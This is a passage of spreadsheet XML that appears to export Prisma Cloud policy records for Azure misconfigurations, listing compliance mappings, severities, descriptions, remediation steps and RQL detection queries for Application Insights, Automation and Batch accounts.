          <t>TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, NYDFS 23 CRR-NY 500.0, ITSG-33</t>
        </is>
      </c>
      <c r="B2218" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2218" s="2" t="inlineStr"/>
      <c r="D2218" t="inlineStr"/>
      <c r="E2218" t="inlineStr"/>
      <c r="F2218" t="inlineStr"/>
      <c r="G2218" t="b">
        <v>0</v>
      </c>
      <c r="H22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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2218" t="inlineStr">
        <is>
          <t>azure-application-insights</t>
        </is>
      </c>
      <c r="K2218" t="inlineStr">
        <is>
          <t>Azure Application Insights not configured with Azure Active Directory (Azure AD) authentication</t>
        </is>
      </c>
      <c r="L2218" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2218" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2218" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2218" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2218" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2218" t="inlineStr">
        <is>
          <t>IA</t>
        </is>
      </c>
      <c r="R2218" t="inlineStr">
        <is>
          <t>IA-5:Authenticator Management</t>
        </is>
      </c>
      <c r="S2218" t="inlineStr"/>
      <c r="T2218" t="b">
        <v>0</v>
      </c>
      <c r="U2218" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2218" t="inlineStr">
        <is>
          <t>azure-application-insights-component</t>
        </is>
      </c>
      <c r="W2218" t="inlineStr">
        <is>
          <t>This policy identifies Application Insights that are not configured with Azure Active Directory (AAD) authentication and are enabled with local authentication.
Disabling local authentication and using AAD-based authentication enhances the security and reliability of the telemetry used to make both critical operational and business decisions.
It is recommended to configure the Application Insights with Azure Active Directory (AAD) authentication so that all actions are strongly authenticated.</t>
        </is>
      </c>
      <c r="X2218" t="inlineStr">
        <is>
          <t>To configure Azure Active Directory (AAD) authentication and disable local authentication on existing Application Insights, follow the below URL instructions:
https://docs.microsoft.com/en-us/azure/azure-monitor/app/azure-ad-authentication</t>
        </is>
      </c>
      <c r="Y2218" t="inlineStr"/>
      <c r="Z2218" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-application-insights-component' AND json.rule = properties.provisioningState equals Succeeded and (properties.DisableLocalAuth does not exist or properties.DisableLocalAuth is false)</t>
        </is>
      </c>
      <c r="AA2218" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB2218" t="inlineStr">
        <is>
          <t>2024-11-13 23:45:49</t>
        </is>
      </c>
      <c r="AC2218" t="inlineStr">
        <is>
          <t>PC-AZR-AAI-853</t>
        </is>
      </c>
      <c r="AD2218" t="b">
        <v>1</v>
      </c>
      <c r="AE2218" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2218" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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8" t="inlineStr">
        <is>
          <t>e9103419-ff7d-4e08-b915-aa17e3252fb0</t>
        </is>
      </c>
      <c r="AI2218" t="inlineStr">
        <is>
          <t>33b463a9-ca53-4521-805c-401a3141a856</t>
        </is>
      </c>
      <c r="AJ2218" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2218" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2219">
      <c r="A2219" t="inlineStr"/>
      <c r="B2219" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2219" s="2" t="inlineStr"/>
      <c r="D2219" t="n">
        <v>0</v>
      </c>
      <c r="E2219" t="n">
        <v>1</v>
      </c>
      <c r="F2219" t="n">
        <v>0</v>
      </c>
      <c r="G2219" t="b">
        <v>1</v>
      </c>
      <c r="H22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19" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2219" t="inlineStr">
        <is>
          <t>azure-automation-account</t>
        </is>
      </c>
      <c r="K2219" t="inlineStr">
        <is>
          <t>Pramm -- automation account azure - New</t>
        </is>
      </c>
      <c r="L2219" t="inlineStr"/>
      <c r="M2219" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2219" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2219" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2219" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2219" t="inlineStr"/>
      <c r="R2219" t="inlineStr"/>
      <c r="S2219" t="inlineStr"/>
      <c r="T2219" t="b">
        <v>0</v>
      </c>
      <c r="U2219" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2219" t="inlineStr">
        <is>
          <t>azure-automation-account</t>
        </is>
      </c>
      <c r="W2219" t="inlineStr">
        <is>
          <t>Pramm -- automation account azure for Tata-AIA</t>
        </is>
      </c>
      <c r="X2219" t="inlineStr"/>
      <c r="Y2219" t="inlineStr"/>
      <c r="Z2219" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-automation-account' AND json.rule = properties.publicNetworkAccess does not exist or properties.publicNetworkAccess is true AND json.rule = name is not member of ( "Prisma-ETL-DataLake-Automation-dev" )</t>
        </is>
      </c>
      <c r="AA2219" t="inlineStr">
        <is>
          <t>Pramod Dhamenia</t>
        </is>
      </c>
      <c r="AB2219" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2219" t="inlineStr"/>
      <c r="AD2219" t="b">
        <v>0</v>
      </c>
      <c r="AE2219" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2219" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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19" t="inlineStr">
        <is>
          <t>bc0e6e8d-cf05-4735-9d5b-665705f54b67</t>
        </is>
      </c>
      <c r="AI2219" t="inlineStr">
        <is>
          <t>16fe9041-e422-498c-b290-10331bae2b2c</t>
        </is>
      </c>
      <c r="AJ2219" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2219" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2220">
      <c r="A2220" t="inlineStr"/>
      <c r="B2220" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2220" s="2" t="inlineStr"/>
      <c r="D2220" t="inlineStr"/>
      <c r="E2220" t="inlineStr"/>
      <c r="F2220" t="inlineStr"/>
      <c r="G2220" t="b">
        <v>0</v>
      </c>
      <c r="H22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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2220" t="inlineStr">
        <is>
          <t>azure-automation-account</t>
        </is>
      </c>
      <c r="K2220" t="inlineStr">
        <is>
          <t>Cloned: Pramm-azure-automation-account</t>
        </is>
      </c>
      <c r="L2220" t="inlineStr"/>
      <c r="M2220" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2220" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2220" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2220" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2220" t="inlineStr"/>
      <c r="R2220" t="inlineStr"/>
      <c r="S2220" t="inlineStr"/>
      <c r="T2220" t="b">
        <v>0</v>
      </c>
      <c r="U2220" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2220" t="inlineStr">
        <is>
          <t>azure-automation-account</t>
        </is>
      </c>
      <c r="W2220" t="inlineStr">
        <is>
          <t>Pramm-azure-automation-account tags does not exist</t>
        </is>
      </c>
      <c r="X2220" t="inlineStr"/>
      <c r="Y2220" t="inlineStr"/>
      <c r="Z2220" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-automation-account' AND json.rule = properties.publicNetworkAccess does not exist or properties.publicNetworkAccess is true and tags exists and tags does not contain "development"</t>
        </is>
      </c>
      <c r="AA2220" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2220" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2220" t="inlineStr"/>
      <c r="AD2220" t="b">
        <v>0</v>
      </c>
      <c r="AE2220" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2220" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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0" t="inlineStr">
        <is>
          <t>c9715233-11c3-4cb9-abee-e05b0f13a802</t>
        </is>
      </c>
      <c r="AI2220" t="inlineStr">
        <is>
          <t>6f8cb8c9-5741-47e5-a261-d2af80213823</t>
        </is>
      </c>
      <c r="AJ2220" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2220" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2221">
      <c r="A2221" t="inlineStr"/>
      <c r="B2221" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2221" s="2" t="inlineStr"/>
      <c r="D2221" t="n">
        <v>0</v>
      </c>
      <c r="E2221" t="n">
        <v>1</v>
      </c>
      <c r="F2221" t="n">
        <v>0</v>
      </c>
      <c r="G2221" t="b">
        <v>1</v>
      </c>
      <c r="H22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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2221" t="inlineStr">
        <is>
          <t>azure-automation-account</t>
        </is>
      </c>
      <c r="K2221" t="inlineStr">
        <is>
          <t>Pramm-azure-automation-account</t>
        </is>
      </c>
      <c r="L2221" t="inlineStr"/>
      <c r="M2221" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2221" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2221" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2221" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2221" t="inlineStr"/>
      <c r="R2221" t="inlineStr"/>
      <c r="S2221" t="inlineStr">
        <is>
          <t>Pramm-azure-policy</t>
        </is>
      </c>
      <c r="T2221" t="b">
        <v>0</v>
      </c>
      <c r="U2221" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2221" t="inlineStr">
        <is>
          <t>azure-automation-account</t>
        </is>
      </c>
      <c r="W2221" t="inlineStr">
        <is>
          <t>Pramm-azure-automation-account</t>
        </is>
      </c>
      <c r="X2221" t="inlineStr"/>
      <c r="Y2221" t="inlineStr"/>
      <c r="Z2221" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-automation-account' AND json.rule = properties.publicNetworkAccess does not exist or properties.publicNetworkAccess is true and tags exists and tags contains "development"</t>
        </is>
      </c>
      <c r="AA2221" t="inlineStr">
        <is>
          <t>Pramod Dhamenia</t>
        </is>
      </c>
      <c r="AB2221" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2221" t="inlineStr"/>
      <c r="AD2221" t="b">
        <v>0</v>
      </c>
      <c r="AE2221" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2221" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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1" t="inlineStr">
        <is>
          <t>17065f63-ecbc-4c33-b524-6ac79e187dac</t>
        </is>
      </c>
      <c r="AI2221" t="inlineStr">
        <is>
          <t>98abbee1-de0d-459b-990e-48b47a7640b4</t>
        </is>
      </c>
      <c r="AJ2221" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2221" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2222">
      <c r="A2222" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, NIST SP 800-171 Revision 3, TX-RAMP Level 1, Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2022.2.1, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, Sarbanes Oxley Act (SOX), Sarbanes Oxley Act (SOX), TX-RAMP Level 2, MLPS 2.0 (Level 2), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ITSG-33, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ITSG-33, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B2222" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2222" s="2" t="inlineStr"/>
      <c r="D2222" t="inlineStr"/>
      <c r="E2222" t="inlineStr"/>
      <c r="F2222" t="inlineStr"/>
      <c r="G2222" t="b">
        <v>1</v>
      </c>
      <c r="H22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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2222" t="inlineStr">
        <is>
          <t>azure-automation-account</t>
        </is>
      </c>
      <c r="K2222" t="inlineStr">
        <is>
          <t>Azure Automation account is not configured with managed identity</t>
        </is>
      </c>
      <c r="L2222" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2222" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2222" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2222" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2222" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2222" t="inlineStr">
        <is>
          <t>Principle 6</t>
        </is>
      </c>
      <c r="R2222" t="inlineStr">
        <is>
          <t>6.2.5</t>
        </is>
      </c>
      <c r="S2222" t="inlineStr"/>
      <c r="T2222" t="b">
        <v>0</v>
      </c>
      <c r="U2222" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2222" t="inlineStr">
        <is>
          <t>azure-automation-account</t>
        </is>
      </c>
      <c r="W2222" t="inlineStr">
        <is>
          <t>This policy identifies Automation accounts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Automation account.</t>
        </is>
      </c>
      <c r="X2222" t="inlineStr">
        <is>
          <t>To enable managed identity on an existing Azure Automation account, follow the below URL:
https://docs.microsoft.com/en-us/azure/automation/quickstarts/enable-managed-identity 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/bc-azure-2-36
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/bc-azure-2-36</t>
        </is>
      </c>
      <c r="Y2222" t="inlineStr"/>
      <c r="Z2222" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-automation-account' AND json.rule = identity does not exist or identity.type equal ignore case "None"
{"category":"IAM","resourceTypes":["azurerm_automation_account"]}</t>
        </is>
      </c>
      <c r="AA2222" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2222" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2222" t="inlineStr">
        <is>
          <t>PC-AZR-AAC-872-CKV2_AZURE_36</t>
        </is>
      </c>
      <c r="AD2222" t="b">
        <v>1</v>
      </c>
      <c r="AE2222" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2222" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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2" t="inlineStr">
        <is>
          <t>76edf731-a606-4409-86a9-6f71209b6681</t>
        </is>
      </c>
      <c r="AI2222" t="inlineStr">
        <is>
          <t>932d9a66-dd82-47ce-a7a7-be5a725f8d0a</t>
        </is>
      </c>
      <c r="AJ2222" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2222" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2223">
      <c r="A2223" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO/IEC 27001:2022, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2022.2.1, HIPAA, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, SOC 2, SOC 2, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B2223" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2223" s="2" t="inlineStr"/>
      <c r="D2223" t="inlineStr"/>
      <c r="E2223" t="inlineStr"/>
      <c r="F2223" t="inlineStr"/>
      <c r="G2223" t="b">
        <v>1</v>
      </c>
      <c r="H22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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2223" t="inlineStr">
        <is>
          <t>azure-automation-account</t>
        </is>
      </c>
      <c r="K2223" t="inlineStr">
        <is>
          <t>Azure Automation account configured with overly permissive network access</t>
        </is>
      </c>
      <c r="L2223" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2223" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2223" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2223" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2223" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2223" t="inlineStr">
        <is>
          <t>Organisational Controls</t>
        </is>
      </c>
      <c r="R2223" t="inlineStr">
        <is>
          <t>A5.15</t>
        </is>
      </c>
      <c r="S2223" t="inlineStr"/>
      <c r="T2223" t="b">
        <v>0</v>
      </c>
      <c r="U2223" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2223" t="inlineStr">
        <is>
          <t>azure-automation-account</t>
        </is>
      </c>
      <c r="W2223" t="inlineStr">
        <is>
          <t>This policy identifies Automation accounts configured with overly permissive network access. It is recommended to configure the Automation account with private endpoints so that the Automation account is accessible only to restricted entities.</t>
        </is>
      </c>
      <c r="X2223" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Go to Automation Account dashboard 
3. Click on the reported Automation account
4. Under the 'Account Settings' menu, click on 'Networking'
5. In 'Public access' tab, select 'Disable' for 'Public network access' 
6. In 'Private access' tab, Create a private endpoint with required parameters 
7. Click on 'Apply' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-24
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-24</t>
        </is>
      </c>
      <c r="Y2223" t="inlineStr"/>
      <c r="Z2223" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-automation-account' AND json.rule = properties.publicNetworkAccess does not exist or properties.publicNetworkAccess is true
{"category":"General","resourceTypes":["azurerm_automation_account"]}</t>
        </is>
      </c>
      <c r="AA2223" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2223" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2223" t="inlineStr">
        <is>
          <t>PC-AZR-AAC-877-CKV2_AZURE_24</t>
        </is>
      </c>
      <c r="AD2223" t="b">
        <v>1</v>
      </c>
      <c r="AE2223" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2223" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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3" t="inlineStr">
        <is>
          <t>0867c7e0-8f23-40e9-abb9-21403a43b4ab</t>
        </is>
      </c>
      <c r="AI2223" t="inlineStr">
        <is>
          <t>d7518237-8ab1-4770-b6e6-6c8d4ca46839</t>
        </is>
      </c>
      <c r="AJ2223" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2223" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2224">
      <c r="A2224" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, Insurance Regulatory And Development Authority Of India, CIS Controls v8.1, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2022.2.1, MLPS 2.0 (Level 2), SOC 2, Microsoft Cloud Security Benchmark v1, Sarbanes Oxley Act (SOX), NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2224" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2224" s="2" t="inlineStr"/>
      <c r="D2224" t="inlineStr"/>
      <c r="E2224" t="inlineStr"/>
      <c r="F2224" t="inlineStr"/>
      <c r="G2224" t="b">
        <v>1</v>
      </c>
      <c r="H22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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2224" t="inlineStr">
        <is>
          <t>azure-automation-account</t>
        </is>
      </c>
      <c r="K2224" t="inlineStr">
        <is>
          <t>Azure Automation account variables are not encrypted</t>
        </is>
      </c>
      <c r="L2224" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2224" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2224" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2224" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2224" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2224" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2224" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2224" t="inlineStr"/>
      <c r="T2224" t="b">
        <v>0</v>
      </c>
      <c r="U2224" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2224" t="inlineStr">
        <is>
          <t>azure-automation-account</t>
        </is>
      </c>
      <c r="W2224" t="inlineStr">
        <is>
          <t>This policy identifies Automation accounts variables that are not encrypted. Variable assets are values that are available to all runbooks and DSC configurations in your Automation account. When a variable is created, you can specify that it be stored encrypted. Azure Automation stores each encrypted variable securely. It is recommended to enable encryption of Automation account variable assets when storing sensitive data.</t>
        </is>
      </c>
      <c r="X2224" t="inlineStr">
        <is>
          <t>1. Log in to Azure portal
2. Navigate to 'Automation Accounts'
3. Click on the reported Automation Account
4. Select 'Variables' under 'Shared Resources' from left panel 
NOTE: If you have Automation account variables storing sensitive data that are not already encrypted, then you will need to delete them and recreate them as encrypted variables.
5. Delete the unencrypted variables and recreate them by setting the option 'Encrypted' as 'Yes'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-automation-account-variables-are-encrypted
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-automation-account-variables-are-encrypted</t>
        </is>
      </c>
      <c r="Y2224" t="inlineStr"/>
      <c r="Z2224" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-automation-account' AND json.rule = variable[?any(properties.isEncrypted is false)] exists
{"category":"General","resourceTypes":["azurerm_automation_variable_bool", "azurerm_automation_variable_string", "azurerm_automation_variable_int", "azurerm_automation_variable_datetime"]}</t>
        </is>
      </c>
      <c r="AA2224" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2224" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2224" t="inlineStr">
        <is>
          <t>PC-AZR-AAC-912-CKV_AZURE_73</t>
        </is>
      </c>
      <c r="AD2224" t="b">
        <v>1</v>
      </c>
      <c r="AE2224" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2224" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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4" t="inlineStr">
        <is>
          <t>fe857a62-4d04-4429-bd45-e502ccbd5c8d</t>
        </is>
      </c>
      <c r="AI2224" t="inlineStr">
        <is>
          <t>9f439679-edfa-482f-8627-bf1d00ebbe7e</t>
        </is>
      </c>
      <c r="AJ2224" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2224" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2225">
      <c r="A2225" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO/IEC 27001:2022, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, HIPAA, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, SOC 2, SOC 2, TX-RAMP Level 1, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B2225" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2225" s="2" t="inlineStr"/>
      <c r="D2225" t="inlineStr"/>
      <c r="E2225" t="inlineStr"/>
      <c r="F2225" t="inlineStr"/>
      <c r="G2225" t="b">
        <v>1</v>
      </c>
      <c r="H22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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2225" t="inlineStr">
        <is>
          <t>azure-batch-account</t>
        </is>
      </c>
      <c r="K2225" t="inlineStr">
        <is>
          <t>Azure Batch Account configured with overly permissive network access</t>
        </is>
      </c>
      <c r="L2225" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2225" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2225" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2225" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2225" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2225" t="inlineStr">
        <is>
          <t>Organisational Controls</t>
        </is>
      </c>
      <c r="R2225" t="inlineStr">
        <is>
          <t>A5.15</t>
        </is>
      </c>
      <c r="S2225" t="inlineStr"/>
      <c r="T2225" t="b">
        <v>0</v>
      </c>
      <c r="U2225" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2225" t="inlineStr">
        <is>
          <t>azure-batch-account</t>
        </is>
      </c>
      <c r="W2225" t="inlineStr">
        <is>
          <t>This policy identifies Batch Accounts configured with overly permissive network access. By default, Batch accounts are accessible from all the networks. With an Account access IP firewall, you can restrict it further to only a set of IPv4 addresses or IPv4 address ranges. With Private access Virtual Networks, the network traffic path is secured on both ends. It is recommended to configure the Batch account with an IP firewall or by Virtual Network, so that the Batch account is accessible only to restricted entities.</t>
        </is>
      </c>
      <c r="X2225" t="inlineStr">
        <is>
          <t>To configure private access private endpoint, follow below URL:
https://docs.microsoft.com/en-gb/azure/batch/private-connectivity#azure-portal
To disable public network, follow below URL:
https://docs.microsoft.com/en-gb/azure/batch/public-network-access#disable-public-network-access
If Batch account is intended access from public network, restrict it to specific IP ranges. To allow public network access with specific network rules, follow below URL:
https://docs.microsoft.com/en-gb/azure/batch/public-network-access#access-from-selected-public-networks</t>
        </is>
      </c>
      <c r="Y2225" t="inlineStr"/>
      <c r="Z2225" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-batch-account' AND json.rule = properties.provisioningState equal ignore case Succeeded and properties.networkProfile.accountAccess.defaultAction equal ignore case Allow and properties.publicNetworkAccess equal ignore case Enabled</t>
        </is>
      </c>
      <c r="AA2225" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2225" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2225" t="inlineStr">
        <is>
          <t>PC-AZR-ABT-931</t>
        </is>
      </c>
      <c r="AD2225" t="b">
        <v>1</v>
      </c>
      <c r="AE2225" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2225" t="inlineStr">
        <is>
